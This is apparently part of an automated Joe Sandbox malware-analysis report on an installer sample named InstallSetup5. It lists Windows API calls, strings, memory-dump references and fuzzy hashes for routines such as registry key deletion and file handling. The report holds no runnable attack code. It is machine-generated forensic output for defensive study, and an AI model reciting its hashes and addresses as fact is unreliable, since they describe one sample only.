                                                                                                                                                              • Instruction Fuzzy Hash: C9312271200315BBD2206B619D49F2B3A5CEF85718F16043EFD42FA2C2DB7D99258ABD
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(004326A0,00000400), ref: 004066B6
                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(004326A0,00000400,00000000,0042BA48,?,?,00000000,00000000,00426903,762323A0), ref: 004066CC
                                                                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,004326A0), ref: 0040672A
                                                                                                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406733
                                                                                                                                                              • lstrcatW.KERNEL32(004326A0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040675E
                                                                                                                                                              • lstrlenW.KERNEL32(004326A0,00000000,0042BA48,?,?,00000000,00000000,00426903,762323A0), ref: 004067B8
                                                                                                                                                              Strings
                                                                                                                                                              • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406758
                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406687
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                              • API String ID: 4024019347-730719616
                                                                                                                                                              • Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                                                                                                                              • Instruction ID: fc62ecdfc612bfadb4c03fc2fb2820e4449372332e166df7cb208319b666a0da
                                                                                                                                                              • Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                                                                                                                              • Instruction Fuzzy Hash: 7D612571A046009BD720AF24DD84B6A76E8EF95328F16053FF643B32D0DB7C9961875E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 0040455A
                                                                                                                                                              • GetSysColor.USER32(00000000), ref: 00404598
                                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 004045A4
                                                                                                                                                              • SetBkMode.GDI32(?,?), ref: 004045B0
                                                                                                                                                              • GetSysColor.USER32(?), ref: 004045C3
                                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 004045D3
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004045ED
                                                                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 004045F7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                                              • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                                              • Instruction ID: 069c4eaec478219780f05c004fc5973679282d3c2eb16bc8cec9dcb23997e36d
                                                                                                                                                              • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                                              • Instruction Fuzzy Hash: 592151B1500704ABCB20DF68DE08A5B7BF8AF41714B05892EEA96A22E0D739E944CF54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                                                                                                                                                • Part of subcall function 00406128: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040613E
                                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                              • String ID: 9
                                                                                                                                                              • API String ID: 163830602-2366072709
                                                                                                                                                              • Opcode ID: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                                                                                                                                              • Instruction ID: e892b7cb172a86a35cdf2d5061c859a119b49b65f2ae0b0c69c9b35c58dd84de
                                                                                                                                                              • Opcode Fuzzy Hash: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                                                                                                                                              • Instruction Fuzzy Hash: F151FB75D0411AABDF24DFD4CA85AAEBBB9FF04344F10817BE901B62D0D7B49D828B58
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(0042BA48,00000000,00426903,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                                                                                              • lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00426903,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                                                                                              • lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
                                                                                                                                                              • SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2531174081-0
                                                                                                                                                              • Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                                                                                                                              • Instruction ID: 906fe2e33ec339045028823105f1a28636d6cdc7c4a53a0106b9bb612f22f5f3
                                                                                                                                                              • Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                                                                                                                              • Instruction Fuzzy Hash: 9121A171900158BACB119F65DD449CFBFB4EF45350F50843AF508B62A0C3794A50CFA8
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,0043F000,76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                                                                                                                                              • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                                                                                                                                              • CharNextW.USER32(?,0043F000,76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                                                                                                                                              • CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                                              • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                              • API String ID: 589700163-826357637
                                                                                                                                                              • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                                                                                              • Instruction ID: fa9c0ef9ae643832d728fa0671e6943ea0b093c18f887e6db6f7fe1f852dcfd9
                                                                                                                                                              • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                                                                                              • Instruction Fuzzy Hash: F111932780221299DB303B148C40E7766E8AF54794F52C43FED8A722C0F77C4C9286AD
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EAC
                                                                                                                                                              • GetMessagePos.USER32 ref: 00404EB4
                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404ECE
                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EE0
                                                                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F06
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                                              • String ID: f
                                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                                              • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                                              • Instruction ID: eb967d7d92909976ed67768bbc6bf91133f1097352fa1b537f2083fc5134d3bd
                                                                                                                                                              • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                                              • Instruction Fuzzy Hash: AB019E71900219BADB00DB94DD81FFEBBBCAF95710F10412BFB11B61C0C7B4AA018BA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                                                                                                                                              • MulDiv.KERNEL32(0028C520,00000064,0028C524), ref: 00402FE1
                                                                                                                                                              • wsprintfW.USER32 ref: 00402FF1
                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00403001
                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                                                                                                                                              Strings
                                                                                                                                                              • verifying installer: %d%%, xrefs: 00402FEB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                              • String ID: verifying installer: %d%%
                                                                                                                                                              • API String ID: 1451636040-82062127
                                                                                                                                                              • Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                                                                                                                              • Instruction ID: b4a4546c530c1255e03538258eeb387f0310dfe45b0532776fb26864182fd6cc
                                                                                                                                                              • Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                                                                                                                              • Instruction Fuzzy Hash: 8D014F71640208BBEF209F60DE49FEE3B79AB04344F108039FA02B91D0DBB99A559B59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                                                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2667972263-0
                                                                                                                                                              • Opcode ID: bce569f9812bba37990cf9c23fa7c44f4211c5a4fa57b4e7c5ebecb75cd2c75b
                                                                                                                                                              • Instruction ID: 9240dae09012554c896714223f9a1d047de53ad28ef79bac3653223f28d0231c
                                                                                                                                                              • Opcode Fuzzy Hash: bce569f9812bba37990cf9c23fa7c44f4211c5a4fa57b4e7c5ebecb75cd2c75b
                                                                                                                                                              • Instruction Fuzzy Hash: 3931AD71D00124BBCF21AFA5CE89D9E7E79AF49324F10423AF521762E1CB794D419BA8
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseEnum$DeleteValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1354259210-0
                                                                                                                                                              • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                                                                                                              • Instruction ID: 7c59605d0ca35e0e1f1170af87acd2d95b5481229a772e02f8b12e0d157fbf49
                                                                                                                                                              • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                                                                                                              • Instruction Fuzzy Hash: 2A216B7150010ABFDF119F90CE89EEF7B7DEB54398F100076B949B21E0D7B49E54AA68
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00401DEA
                                                                                                                                                              • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                                                                                                                              • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1849352358-0
